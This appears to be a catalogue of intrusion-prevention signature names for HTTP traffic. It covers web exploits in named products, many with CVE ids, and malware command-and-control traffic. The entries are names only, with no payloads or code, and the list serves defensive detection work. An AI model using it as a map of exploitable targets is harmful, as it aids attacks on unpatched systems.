HTTP_CRL-Gambio-Online-Webshop-Unauthenticated-PHP-Deserialization-Vulnerability
HTTP_CRL-GE-Fanuc-Proficy-HMI/SCADA-CIMPLICITY-Webserver-Information-Disclosure
HTTP_CRL-GE-Mds-Pulsenet-Hidden-Support-Account-Remote-Code-Execution
HTTP_CRL-General-Client-Login-Attempt
HTTP_CRL-Generic-Cmd-Encoder
HTTP_CRL-GeoServer-Jiffle-Remote-Code-Execution-CVE-2022-24816
HTTP_CRL-GeoServer-Server-Side-Request-Forgery-CVE-2021-40822
HTTP_CRL-GeoServer-SQL-Injection-CVE-2023-25157
HTTP_CRL-GeoServer-Unauthenticated-Remote-Code-Execution-CVE-2024-36401
HTTP_CRL-Gestart-Aide-Php-Remote-Code-Execution
HTTP_CRL-GetSimpleCMS-Unauthenticated-RCE
HTTP_CRL-Geutebruck-Instantrec-Remote-Command-Execution
HTTP_CRL-Geutebruck-Multiple-RCE-CVE-2021-335xx
HTTP_CRL-Ghost-CMS-Content-API-Filtering-Information-Disclosure
HTTP_CRL-Gibbon-Edu-Arbitrary-File-Write-CVE-2023-45878
HTTP_CRL-Gibbon-School-Platform-Authenticated-PHP-Deserialization-Vulnerability
HTTP_CRL-Gila-CMS-DeleteAction-Local-File-Inclusion
HTTP_CRL-Gitea-And-Gogs-Git-Hooks-Remote-Code-Execution
HTTP_CRL-Gitlab-Abstract_reference_filter-Stored-Cross-Site-Scripting
HTTP_CRL-Gitlab-Account-Hijacking-Vulnerability-CVE-2023-7028
HTTP_CRL-Gitlab-Arbitrary-File-Read-Vulnerability-CVE-2023-2825
HTTP_CRL-Gitlab-Branch-Name-Stored-Cross-Site-Scripting
HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-CVE-2023-0921-Denial-Of-Service
HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Filefinder-Regex-Denial-Of-Service
HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Glm_Source-Denial-Of-Service
HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Kroki-Diagram-Stored-XSS
HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Markdown-Render-Denial-Of-Service
HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Merge-Requests-Stored-XSS
HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Milestone-References-Stored-XSS
HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Notes-Stored-Cross-Site-Scripting
HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Profile-Page-Stored-XSS
HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Saml-Authentication-Bypass
HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Web-IDE-Stored-Cross-Site-Scripting
HTTP_CRL-Gitlab-Designreferencefilter-Stored-Cross-Site-Scripting
HTTP_CRL-Gitlab-Gollum-Link-Regex-Denial-Of-Service
HTTP_CRL-Gitlab-Graphql-API-User-Enumeration
HTTP_CRL-Gitlab-Label-Description-Emoji-Uncontrolled-Resource-Consumption
HTTP_CRL-Gitlab-Mermaid-Markdown-Stored-Cross-Site-Scripting
HTTP_CRL-Gitlab-oauth-Page-Stored-XSS-CVE-2024-6530
HTTP_CRL-Gitlab-Project-Settings-Stored-Cross-Site-Scripting
HTTP_CRL-Gitlab-Wiki-API-Attachments-Command-Injection
HTTP_CRL-Gitlist-Argument-Injection-Vulnerability-CVE-2018-1000533
HTTP_CRL-GitStack-Remote-Code-Execution-Vulnerability
HTTP_CRL-GitStack-Unauthenticated-Rest-API-Requests
HTTP_CRL-GitStack-Unsanitized-Argument-Remote-Code-Execution
HTTP_CRL-GiveWP-Unauthenticated-Donation-Process-Exploit
HTTP_CRL-GiveWP-Unauthenticated-Donation-Process-Exploit-2
HTTP_CRL-GLPI-Auth.php-SQL-Injection
HTTP_CRL-GLPI-Computervirtualmachine-SQL-Injection
HTTP_CRL-GLPI-install.php-Remote-Command-Execution
HTTP_CRL-Gmail-Web-Interface-Usage
HTTP_CRL-GoAnywhere-MFT-Remote-Code-Execution-CVE-2023-0669
HTTP_CRL-Gogs-File-Upload-Tree_path-Command-Injection
HTTP_CRL-Gogs-File-Upload-Tree_path-CVE-2022-2024-Command-Injection
HTTP_CRL-Gogs-Full-Name-Stored-Cross-Site-Scripting
HTTP_CRL-Gogs-Repository-Contents-API-Path-Traversal
HTTP_CRL-Google-Chrome-Xssauditor-Policy-Bypass
HTTP_CRL-Google-Talk-Instant-Messaging-Web-Interface-Usage
HTTP_CRL-Gozi-Malware-Infection-Traffic
HTTP_CRL-Grafana-Labs-Grafana-CVE-2021-41174-Cross-Site-Scripting
HTTP_CRL-Grafana-SQL-Expressions-Command-Injection-And-Local-File-Inclusion
HTTP_CRL-Grafana-Unified-Alerting-Stored-Cross-Site-Scripting
HTTP_CRL-Grandstream-UCM6200-SQL-Injection-CVE-2020-5722
HTTP_CRL-Graphite-Web-Unsafe-Pickle-Handling-Vulnerability
HTTP_CRL-GravCMS-Remote-Command-Execution
HTTP_CRL-Groupwise-ServletManager-Application-Admin
HTTP_CRL-Grum-Spambot
HTTP_CRL-Guestserver-Cgi-System-Compromise
HTTP_CRL-Gumblar-Bot-Traffic
HTTP_CRL-Guppy-Error-Php-Server-Remote-Addr-Php-Command-Execution
HTTP_CRL-H0lyGh0st-Ransomware-C2-Traffic
HTTP_CRL-H2-Database-Console-Jdbcutils-JNDI-Injection
HTTP_CRL-H2-Database-JDBC-URL-Arbitrary-Code-Execution
HTTP_CRL-H2-Web-Interface-Create-Alias-RCE
HTTP_CRL-Hak5-WiFi-Pineapple-Preconfiguration-Command-Injection
HTTP_CRL-Ham-Backdoor-Request
HTTP_CRL-Hancitor-C2-Traffic
HTTP_CRL-Hanove.F-Traffic
HTTP_CRL-Hashicorp-Consul-Rexec-RCE
HTTP_CRL-Hastymail-Remote-Command-Execution
HTTP_CRL-Heur.LP-Traffic
HTTP_CRL-HeurGeneric-Traffic
HTTP_CRL-Hewlett-Packard-Enterprise-Vertica-Validateadminconfig-Remote-Command-Injection
HTTP_CRL-HomeMatic-CCU2-RCE
HTTP_CRL-Horde-Backdoor-Code-Execution
HTTP_CRL-Horde-CSV-Import-Arbitrary-PHP-Code-Execution
HTTP_CRL-Horde-Webmail-Form-File-Upload
HTTP_CRL-Horde-Webmail-Turba_Factory_Driver-Insecure-Deserialization
HTTP_CRL-Hotclip.A-Traffic
HTTP_CRL-HP-Data-Protector-Media-Operations-SignInName-Parameter-Overflow
HTTP_CRL-HP-Intelligent-Management-Center-BIMS-Uploadservlet-Arbitrary-File-Upload
HTTP_CRL-HP-Network-Node-Manager-I-Multiple-Cross-Site-Scripting-Vulnerabilities
HTTP_CRL-HP-OpenView-Network-Node-Manager-Getcvdata.exe-BOF
HTTP_CRL-HP-OpenView-Network-Node-Manager-Invalid-Option-Buffer-Overflow
HTTP_CRL-HP-OpenView-Network-Node-Manager-Jovgraph-Argument-Buffer-Overflow
HTTP_CRL-HP-OpenView-Network-Node-Manager-Jovgraph-Displaywidth-Buffer-Overflow
HTTP_CRL-HP-OpenView-Network-Node-Manager-netmon.exe-BOF
HTTP_CRL-HP-OpenView-Network-Node-Manager-Nnmrptconfig-Nameparams-Text1-BOF
HTTP_CRL-HP-OpenView-Network-Node-Manager-Nnmrptconfig-Template-Format-String
HTTP_CRL-HP-OpenView-Network-Node-Manager-Ov.dll-ovbuildpath-Buffer-Overflow
HTTP_CRL-HP-OpenView-Network-Node-Manager-ovet_demandpoll.exe-Format-String
HTTP_CRL-HP-OpenView-Network-Node-Manager-Ovlogin.exe-Buffer-Overflow
HTTP_CRL-HP-OpenView-Network-Node-Manager-OvWebHelp.exe-Buffer-Overflow
HTTP_CRL-HP-OpenView-Network-Node-Manager-ovwebsnmpsrv.exe-OVwSelection-BOF
HTTP_CRL-HP-OpenView-Network-Node-Manager-Rping-Stack-Buffer-Overflow
HTTP_CRL-HP-OpenView-Network-Node-Manager-Schd_select1-Remote-Code-Execution
HTTP_CRL-HP-OpenView-Network-Node-Manager-Snmp.exe-Oid-Variable-Buffer-Overflow
HTTP_CRL-HP-OpenView-NNM-getnnmdata.exe-Cgi-Hostname-Parameter-BOF
HTTP_CRL-HP-OpenView-NNM-ovutil.dll-getProxiedStorageAddress-BOF
HTTP_CRL-HP-OpenView-NNM-ovutil.dll-Stringtoseconds-Buffer-Overflow
HTTP_CRL-HP-OpenView-NNM-Snmpviewer.exe-Cgi-Stack-Buffer-Overflow
HTTP_CRL-HP-OpenView-Nnmrptconfig-Network-Node-Manager-Schd-And-Nameparams-BOF
HTTP_CRL-HP-OpenView-Nnmrptconfig-Network-Node-Manager-Schd-And-Nameparams-BOF-2
HTTP_CRL-HP-Power-Manager-Administration-Web-Server-Stack-Buffer-Overflow
HTTP_CRL-HP-Power-Manager-Form-Export-Logs-Buffer-Overflow
HTTP_CRL-HP-Power-Manager-Form-Export-Logs-Directory-Traversal
HTTP_CRL-HP-Sitescope-Emailservlet-Information-Disclosure
HTTP_CRL-HP-Sitescope-Integrationviewer-Default-Credentials
HTTP_CRL-HP-Sitescope-Multiple-Directory-Traversal-Vulnerabilities
HTTP_CRL-HP-System-Management-Homepage-Iprange-Stack-Buffer-Overflow
HTTP_CRL-HP-System-Management-Homepage-Red2301-Redirecturl-Cross-Site-Scripting
HTTP_CRL-HP-Web-Jetadmin
HTTP_CRL-HPE-IMC-Center-Webdmdebugservlet-Insecure-Deserialization
HTTP_CRL-HPE-IMC-Customreporttemplateselectbean-Expression-Language-Injection
HTTP_CRL-HPE-IMC-Deployselectbootrom-Expression-Language-Injection
HTTP_CRL-HPE-IMC-Devgroupselect-Expression-Language-Injection
HTTP_CRL-HPE-IMC-Forwardredirect-Expression-Language-Injection
HTTP_CRL-HPE-IMC-Operatorgrouptreeselectbean-Expression-Language-Injection
HTTP_CRL-HPE-IMC-Sshconfig-Expression-Language-Injection
HTTP_CRL-HPE-IMC-Tvxlanlegendbean-Expression-Language-Injection
HTTP_CRL-HPE-Intelligent-Management-Center-Amf3-Externalizable-Deserialization
HTTP_CRL-HPE-Intelligent-Management-Center-Bytemessageresource-Insecure-Deserialization
HTTP_CRL-HPE-Intelligent-Management-Center-Getselinsbean-Expression-Language-Injection
HTTP_CRL-HPE-Intelligent-Management-Center-Iccselectcommand-Expression-Language-Injection
HTTP_CRL-HPE-Intelligent-Management-Center-Ictexpertdownload-Expression-Language-Injection
HTTP_CRL-HPE-Intelligent-Management-Center-Icttableexporttocsvbean-Expression-Language-Injection
HTTP_CRL-HPE-Intelligent-Management-Center-Plat-Redirectservlet-Parafile-Directory-Traversal
HTTP_CRL-HPE-Intelligent-Management-Center-Platnavigation-Expression-Language-Injection
HTTP_CRL-HPE-Intelligent-Management-Center-Primefaces-Expression-Language-Injection
HTTP_CRL-HPE-Intelligent-Management-Center-Soapconfigbean-Expression-Language-Injection
HTTP_CRL-HPE-Intelligent-Management-Center-Userselectpagingcontent-Expression-Language-Injection
HTTP_CRL-HPE-Intelligent-Management-Center-Viewbatchtaskresultdetail-Language-Injection
HTTP_CRL-HPE-Intelligent-Management-Center-Wmiconfigcontent-Expression-Language-Injection
HTTP_CRL-HPE-Moonshot-Provisioning-Manager-Appliance-Server_Response-Directory-Traversal
HTTP_CRL-HPE-Smart-Storage-Administrator-Code-Execution
HTTP_CRL-HPE-Systems-Insight-Manager-Amf-Deserialization-RCE
HTTP_CRL-Huawei-HG532n-Command-Injection
HTTP_CRL-Huawei-HG866-Authentication-Bypass
HTTP_CRL-Huawei-Router-HG532-Arbitrary-Command-Execution
HTTP_CRL-Hylafax-Faxsurvey-System-Compromise
HTTP_CRL-IBM-Data-Risk-Manager-Path-Traversal
HTTP_CRL-IBM-Informix-Dynamic-Server-testconn-Heap-Buffer-Overflow
HTTP_CRL-IBM-Informix-OpenAdmin-Tool-Welcomeservice.php-Command-Execution
HTTP_CRL-IBM-Lotus-Domino-HPRAgentName-Parameter-Stack-Buffer-Overflow
HTTP_CRL-IBM-OpenAdmin-Tool-Soap-welcomeServer-PHP-Code-Execution
HTTP_CRL-IBM-Qradar-Siem-Authentication-Bypass
HTTP_CRL-IBM-Qradar-Siem-Remotejavascript-Insecure-Deserialization
HTTP_CRL-IBM-Rational-Focal-Point-Login-Servlet-Information-Disclosure
HTTP_CRL-IBM-Spectrum-Protect-Plus-Hfpackage-Command-Injection
HTTP_CRL-IBM-Spectrum-Protect-Plus-Hostname-Command-Injection
HTTP_CRL-IBM-Spectrum-Protect-Plus-Timezone-Command-Injection
HTTP_CRL-IBM-Tivoli-Endpoint-Manager-Web-Reports-Scheduleparam-XSS
HTTP_CRL-IBM-Tivoli-Provisioning-Manager-Express-Asset.getMimeType-SQL-Injection
HTTP_CRL-IBM-Tivoli-Provisioning-Manager-Express-User.updateuservalue-SQL-Injection
HTTP_CRL-IBM-WebSphere-Application-Server-Authentication-Buffer-Overflow
HTTP_CRL-Icingaweb-Directory-Traversal-In-Static-Library-File-Requests
HTTP_CRL-Iconv-ISO-2022-CN-EXT-Buffer-Overflow-CVE-2024-2961
HTTP_CRL-ICSCADA-SQL-Injection
HTTP_CRL-Ids-Evading-Attempt
HTTP_CRL-Ignite-Realtime-OpenFire-Group-summary.jsp-Cross-Site-Scripting
HTTP_CRL-Ignite-Realtime-OpenFire-Server-XSS
HTTP_CRL-Ignite-Realtime-OpenFire-Version-3.7.1-Reflected-XSS
HTTP_CRL-IIS-Exair-DoS
HTTP_CRL-IIS-Isapi-Htr-BOF
HTTP_CRL-IIS-Isapi-Windows-Media-Services-BOF-3
HTTP_CRL-IIS-WebHitsfile-Access
HTTP_CRL-Iisprotect-SQL-Injection-CVE-2003-0377
HTTP_CRL-IkonBoard-Multiple-Vulnerabilities
HTTP_CRL-Imperva-SecureSphere-Pws-Command-Injection
HTTP_CRL-Index-Request-Type
HTTP_CRL-Inductive-Automation-Ignition-Project-Deserialization
HTTP_CRL-InformationSchema-Query
HTTP_CRL-INL-ulog-SQL-Injection
HTTP_CRL-IntegraXOR-SQL-Injection
HTTP_CRL-Intelbras-Wifiber-120AC-inMesh-Command-Injection-CVE-2022-40005
HTTP_CRL-Invisionix-IRSR
HTTP_CRL-IPFire-Firewall-Web-Interface-Backup-Cgi-Command-Injection
HTTP_CRL-IPFire-Pakfire.cgi-Authenticated-RCE
HTTP_CRL-IPFire-Proxy.cgi-RCE
HTTP_CRL-IPFire-Proxy.cgi-Remote-Code-Execution
HTTP_CRL-Iplanet-Web-Admin-Server-Command-Execution
HTTP_CRL-Ipswitch-WhatsUp-Maincfgret-Buffer-Overflow
HTTP_CRL-Ipswitch-WhatsUp-Web-Interface-SQL-Injection
HTTP_CRL-Isapi-Extension-Buffer-Overflow-Attack
HTTP_CRL-ISPConfig-User_settings.php-Arbitrary-File-Inclusion
HTTP_CRL-itok-Token-SQL-Injection
HTTP_CRL-ITS-SCADA-SQL-Injection
HTTP_CRL-Ivanti-Avalanche-Copyfile-Directory-Traversal
HTTP_CRL-Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Arbitrary-File-Upload
HTTP_CRL-Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Mapshare-Command-Injection
HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-CVE-2023-32564-Arbitrary-File-Upload
HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-CVE-2023-46263-Arbitrary-File-Upload
HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-CVE-2024-29848-Arbitrary-File-Upload
HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-Validatefilestoreuncpath-Arbitrary-File-Upload
HTTP_CRL-Ivanti-Avalanche-Getadhocfilepath-Directory-Traversal
HTTP_CRL-Ivanti-Avalanche-Path-Traversal-CVE-2023-41474
HTTP_CRL-Ivanti-Avalanche-Remote-Control-Server-Deleteskin-Directory-Traversal
HTTP_CRL-Ivanti-Avalanche-Remote-Control-Server-Setproperty-Authentication-Bypass
HTTP_CRL-Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection-Server-Side-Request-Forgery
HTTP_CRL-Ivanti-Avalanche-Securefilter-Allowpassthrough-Authentication-Bypass
HTTP_CRL-Ivanti-Avalanche-Validateamcwsconnection-CVE-2024-47008-Server-Side-Request-Forgery
HTTP_CRL-Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-8190
HTTP_CRL-Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-9380
HTTP_CRL-Ivanti-Cloud-Services-Appliance-Setbrokerconfigvalue-SQL-Injection
HTTP_CRL-Ivanti-Connect-Secure-And-Policy-Secure-OpenSSL-Crlf-Injection
HTTP_CRL-Ivanti-Connect-Secure-Authenticated-Crlf-Injection-CVE-2024-37404
HTTP_CRL-Ivanti-CSA-Removecorecertificate-SQL-Injection-CVE-2024-11773
HTTP_CRL-Ivanti-Endpoint-Manager-Credential-Coercion-Through-WSVulnerabilityCore
HTTP_CRL-Ivanti-Endpoint-Manager-DPIDatabase-GetComputerID-SQL-Injection-CVE-2024-50330
HTTP_CRL-Ivanti-Endpoint-Manager-ECustomDataForm-OnSaveToDB-Directory-Traversal
HTTP_CRL-Ivanti-Endpoint-Manager-Getlogfilerulesnameuniquesql-SQL-Injection
HTTP_CRL-Ivanti-Endpoint-Manager-Getsqlstatement-SQL-Injection
HTTP_CRL-Ivanti-Endpoint-Manager-MP_QueryDetail-SQL-Injection-CVE-2024-34781
HTTP_CRL-Ivanti-Endpoint-Manager-Serverasset-Updateassetinfo-SQL-Injection
HTTP_CRL-Ivanti-Endpoint-Manager-Serverkbdmouse-LoadMouseTable-SQL-Injection-CVE-2024-32840
HTTP_CRL-Ivanti-Endpoint-Manager-Servermotherboard-Loadmotherboardtable-SQL-Injection
HTTP_CRL-Ivanti-Endpoint-Manager-Servermotherboard-Loadslotstable-SQL-Injection
HTTP_CRL-Ivanti-Endpoint-Manager-Serverstorage-Buildcdromtable-SQL-Injection
HTTP_CRL-Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatches-SQL-Injection
HTTP_CRL-Ivanti-EPM-RecordGoodApp-SQLi-RCE
HTTP_CRL-Ivanti-MobileIron-Sentry-Authentication-Bypass-CVE-2023-38035
HTTP_CRL-Ivanti-Virtual-Traffic-Manager-Authentication-Bypass
HTTP_CRL-Jason-Maloneys-Cgi-Guestbook-Command-Execution
HTTP_CRL-JAWS-Command-Execution
HTTP_CRL-Jboss-Authentication-Bypass
HTTP_CRL-Jenkins-Active-Choices-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-Artifact-Repository-Parameter-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-Badge-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-Build-Monitor-View-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-Build-With-Parameters-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-Ci-Server-Build-metrics-Cross-Site-Scripting
HTTP_CRL-Jenkins-Ci-Server-Getorcreate-Policy-Bypass
HTTP_CRL-Jenkins-Claim-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-CLI-Deserialization
HTTP_CRL-Jenkins-Config-File-Provider-Plugin-External-Entity-Injection
HTTP_CRL-Jenkins-Dashboard-View-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-Extra-Columns-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-File-Parameter-Plugin-Stashedfileparametervalue-Arbitrary-File-Write
HTTP_CRL-Jenkins-Generic-Webhook-Trigger-Plugin-External-Entity-Injection
HTTP_CRL-Jenkins-Junit-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-Matrix-Project-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-Pipeline-Build-Step-Plugin-Job-Name-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-Plot-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-Script-Security-Plugin-Sandbox-Bypass-CVE-2019-1003029
HTTP_CRL-Jenkins-Scriptler-Plugin-Parameter-Names-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-Scriptler-Plugin-Script-Content-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-Simple-Queue-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Jenkins-Stapler-Remote-Code-Execution-CVE-2018-1000861
HTTP_CRL-Jenkins-Urltrigger-Plugin-External-Entity-Injection
HTTP_CRL-JetBrains-TeamCity-Agent-Distribution-CVE-2024-31138-Stored-XSS
HTTP_CRL-JetBrains-TeamCity-Authentication-Bypass-CVE-2024-27198
HTTP_CRL-JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting
HTTP_CRL-JetBrains-TeamCity-Backup-Directory-Traversal
HTTP_CRL-JetBrains-TeamCity-Backup-History-Stored-Cross-Site-Scripting
HTTP_CRL-JetBrains-TeamCity-Commit-Status-Publisher-Page-Stored-Cross-Site-Scripting
HTTP_CRL-JetBrains-TeamCity-Gitlab-Connection-Stored-Cross-Site-Scripting
HTTP_CRL-JetBrains-TeamCity-Global-Settings-Stored-Cross-Site-Scripting
HTTP_CRL-JetBrains-TeamCity-Jspprecompilation-Authentication-Bypass-CVE-2024-23917
HTTP_CRL-JetBrains-TeamCity-Perforce-Connection-Stored-Cross-Site-Scripting
HTTP_CRL-JetBrains-TeamCity-SSH-Keys-Page-Stored-Cross-Site-Scripting
HTTP_CRL-JetBrains-TeamCity-Vault-Connection-Stored-Cross-Site-Scripting
HTTP_CRL-JFusionPBX-Service-Edit-Command-Injection
HTTP_CRL-Jimureport-Freemarker-Server-Side-Template-Injection-CVE-2023-4450
HTTP_CRL-Joomla!-CMS-Multiple-SQL-Injection-Vulnerabilities
HTTP_CRL-Joomla!-CMS-User-Notes-List-View-SQL-Injection
HTTP_CRL-Joomla!-CMS-Webservice-Authentication-Bypass
HTTP_CRL-Joomla!-CMS-Webservice-Authentication-Bypass-Sensitive-File-Access
HTTP_CRL-Joomla-Akeeba-Kickstart-Remote-Code-Execution
HTTP_CRL-Joomla-CMS-Mod_breadcrumbs-Title-Stored-Cross-Site-Scripting
HTTP_CRL-Joomla-CMS-Mod_Random_Image-Link-Stored-Cross-Site-Scripting
HTTP_CRL-Joomla-CMS-Policy-Bypass-And-Privilege-Escalation-Vulnerabilities
HTTP_CRL-Joomla-CMS-Protostar-Template-Error-Stored-Cross-Site-Scripting
HTTP_CRL-Joomla-Com_Fields-SQL-Injection
HTTP_CRL-Joomla-Content-History-SQL-Injection
HTTP_CRL-Joomla-Webring-Remote-Code-Injection-Compromise
HTTP_CRL-Jorani-Unauthenticated-Remote-Code-Execution
HTTP_CRL-Judge0-Sandbox-Escape-CVE-2024-28189
HTTP_CRL-Junos-OS-J-Web-Arbitrary-File-Upload-PHP-External-Variable-Modification
HTTP_CRL-Junos-OS-Phar-File-Deserialization-CVE-2022-22241
HTTP_CRL-K-Collect-Remote-Coomand-Execution
HTTP_CRL-Kafka-UI-Remote-Code-Execution-CVE-2023-52251
HTTP_CRL-Kaltura-getUserzoneCookie-Code-Execution
HTTP_CRL-Kaltura-Remote-PHP-Code-Execution
HTTP_CRL-Karagany-CnC-Request
HTTP_CRL-Kaseya-VSA-SQL-Injection-Vulnerability-CVE-2017-18362
HTTP_CRL-Kaspersky-Anti-Virus-For-Linux-File-Server-Getreportstatus-Directory-Traversal
HTTP_CRL-Katello-Update-Roles-Missing-Authorization
HTTP_CRL-Kemoge-Traffic
HTTP_CRL-Kentico-CMS-Staging-SyncServer-Remote-Command-Execution
HTTP_CRL-Keysight-N6854a-And-N6841a-RF-Sensor-smsRestoreDatabaseZip-SQL-Injection
HTTP_CRL-Kibana-Upgrade-Assistant-Telemetry-Collector-Prototype-Pollution
HTTP_CRL-Klog-Server-authenticate.php-User-Unauthenticated-Command-Injection
HTTP_CRL-Kong-Gateway-Admin-API-Remote-Code-Execution
HTTP_CRL-Korenix-Jetwave-Command-Injection-CVE-2023-23294
HTTP_CRL-Kovter.B-Traffic
HTTP_CRL-Kramer-Viaware-Remote-Code-Execution-CVE-2021-35064
HTTP_CRL-Ksapp.A-Traffic
HTTP_CRL-LabStore-SQL-Injection
HTTP_CRL-LANDesk-Management-Suite-Amtversion-Cross-Site-Scripting
HTTP_CRL-LANDesk-Management-Suite-Frm_splitfrm-Remote-File-Inclusion
HTTP_CRL-LANDesk-Management-Suite-Remote-File-Inclusion
HTTP_CRL-Langflow-AI-RCE-CVE-2025-3248
HTTP_CRL-Lansweeper-Assetactions-SQL-Injection
HTTP_CRL-Lansweeper-Getassetsbygroupid-SQL-Injection
HTTP_CRL-Lansweeper-Helpdeskactions.aspx-Edittemplate-Directory-Traversal
HTTP_CRL-Lansweeper-Helpdesksetupactions-SQL-Injection
HTTP_CRL-Lansweeper-Webuseractions-Stored-Cross-Site-Scripting
HTTP_CRL-Lantronix-Premierwave-Command-Injection-CVE-2021-21881
HTTP_CRL-Laquis-Scada-Web-Server-Relatorioindividual-Tag-Code-Injection
HTTP_CRL-Laquis-Scada-Web-Server-Relatorioindividual-Titulo-Command-Injection
HTTP_CRL-Laquis-Scada-Web-Server-Relatorionome-Nome-Command-Injection
HTTP_CRL-LB-Link-Command-Injection-CVE-2023-26801
HTTP_CRL-Lexmark-Device-Embedded-Web-Server-RCE
HTTP_CRL-LG-LED-Assistant-Remove3dlut-Directory-Traversal
HTTP_CRL-LG-LED-Assistant-Setthumbnailrc-Directory-Traversal
HTTP_CRL-LG-N1A1-NAS-Remote-Command-Execution-CVE-2018-14839
HTTP_CRL-LG-Simple-Editor-Command-Injection-CVE-2023-40504
HTTP_CRL-LG-Simple-Editor-Cropimage-Directory-Traversal
HTTP_CRL-LibreNMS-Aboutcontroller-Command-Injection
HTTP_CRL-LibreNMS-Address-Search-Address-SQL-Injection
HTTP_CRL-LibreNMS-Alert-Rule-Name-Stored-Cross-Site-Scripting
HTTP_CRL-LibreNMS-API_Functions-List_Devices-Order-SQL-Injection
HTTP_CRL-LibreNMS-Authenticated-Command-Injection-CVE-2024-51092
HTTP_CRL-LibreNMS-Bills-Information-Stored-Cross-Site-Scripting
HTTP_CRL-LibreNMS-Device-Display-Name-Stored-Cross-Site-Scripting-CVE-2024-53457
HTTP_CRL-LibreNMS-Device-Misc-Dynamic_Override_Config-Stored-Cross-Site-Scripting-CVE-2025-23200
HTTP_CRL-LibreNMS-Device-Overview-Stored-Cross-Site-Scripting
HTTP_CRL-LibreNMS-Device-Port-Settings-Description-Stored-XSS-CVE-2025-23199
HTTP_CRL-LibreNMS-Devicegroupcontroller-Name-Stored-Cross-Site-Scripting
HTTP_CRL-LibreNMS-Health-View-Reflected-Cross-Site-Scripting
HTTP_CRL-LibreNMS-Notifications-Title-Stored-Cross-Site-Scripting
HTTP_CRL-LibreNMS-Outages-Outages.inc.php-Reflected-Cross-Site-Scripting
HTTP_CRL-LibreNMS-Packages.inc.php-Package-Name-SQL-Injection
HTTP_CRL-LibreNMS-Ports-List.inc.php-Reflected-Cross-Site-Scripting
HTTP_CRL-LibreNMS-ServiceTemplateController.php-Name-Stored-CSS
HTTP_CRL-Liferay-Portal-JSON-Deserialization-RCE-CVE-2020-7961
HTTP_CRL-Liferay-Portal-User-Account-Stored-Cross-Site-Scripting
HTTP_CRL-Lifesize-Room-Command-Execution
HTTP_CRL-Linear-eMerge-E3-Series-OS-Command-Injection-CVE-2024-9441
HTTP_CRL-Linksys-Routers-Remote-Code-Execution-Vulnerability
HTTP_CRL-Linksys-WRT110-Remote-Command-Execution
HTTP_CRL-Linksys-WRT54-Buffer-Overflow
HTTP_CRL-Linux-Download-Commands-In-Parameter-Values
HTTP_CRL-Loadmoney-Traffic
HTTP_CRL-Log4j-Denial-of-Service-CVE-2021-45105
HTTP_CRL-Log4j-Remote-Code-Execution
HTTP_CRL-Logsign-Remote-Command-Injection
HTTP_CRL-LordEK-Traffic
HTTP_CRL-Lotus-Notes-iNotes-BOF
HTTP_CRL-Lucee-Authenticated-Scheduled-Job-Code-Execution
HTTP_CRL-Lumbko.A-Traffic
HTTP_CRL-Magento-Vimeo-Invalid-Image-Cross-Site-Request-Forgery
HTTP_CRL-Mail-Manage-EX-Php-Include-Exploit
HTTP_CRL-Mailman-Mmstdod-Cgi-System-Compromise
HTTP_CRL-Mailstore-Server-Search-Result-Reflected-Cross-Site-Scripting
HTTP_CRL-Mako-Server-Remote-Command-Injection
HTTP_CRL-Malicious-Request
HTTP_CRL-Maltrail-Unauthenticated-Command-Injection
HTTP_CRL-Manage-Engine-Exchange-Reporter-Plus-Unauthenticated-RCE
HTTP_CRL-Manageengine-Applications-Manager-Commonapiutil-Getmglist-Groupid-SQL-Injection
HTTP_CRL-Manageengine-Applications-Manager-Commonapiutil-SQL-Injection
HTTP_CRL-Manageengine-Applications-Manager-Menuhandlerservlet-SQL-Injection
HTTP_CRL-Manageengine-Desktop-Central-Dcpluginservelet-Policy-Bypass
HTTP_CRL-Manageengine-Desktop-Central-Java-Deserialization
HTTP_CRL-Manageengine-Desktop-Central-mdmLogUploader-Directory-Traversal
HTTP_CRL-Manageengine-Desktop-Central-Msp-Fileuploadservlet-Arbitrary-File-Upload
HTTP_CRL-Manageengine-Desktop-Central-Msp-Statusupdateservlet-Filename-Directory-Traversal
HTTP_CRL-Manageengine-Desktop-Central-Statusupdate-Arbitrary-File-Upload
HTTP_CRL-Manageengine-Desktop-Central-Unauthorized-Administrative-Password-Reset
HTTP_CRL-Manageengine-EventLog-Analyzer-Agenthandler-Information-Disclosure
HTTP_CRL-Manageengine-EventLog-Analyzer-runQuery-Guest-User-SQL-Injection
HTTP_CRL-Manageengine-Firewall-Analyzer-runQuery-Guest-User-SQL-Injection
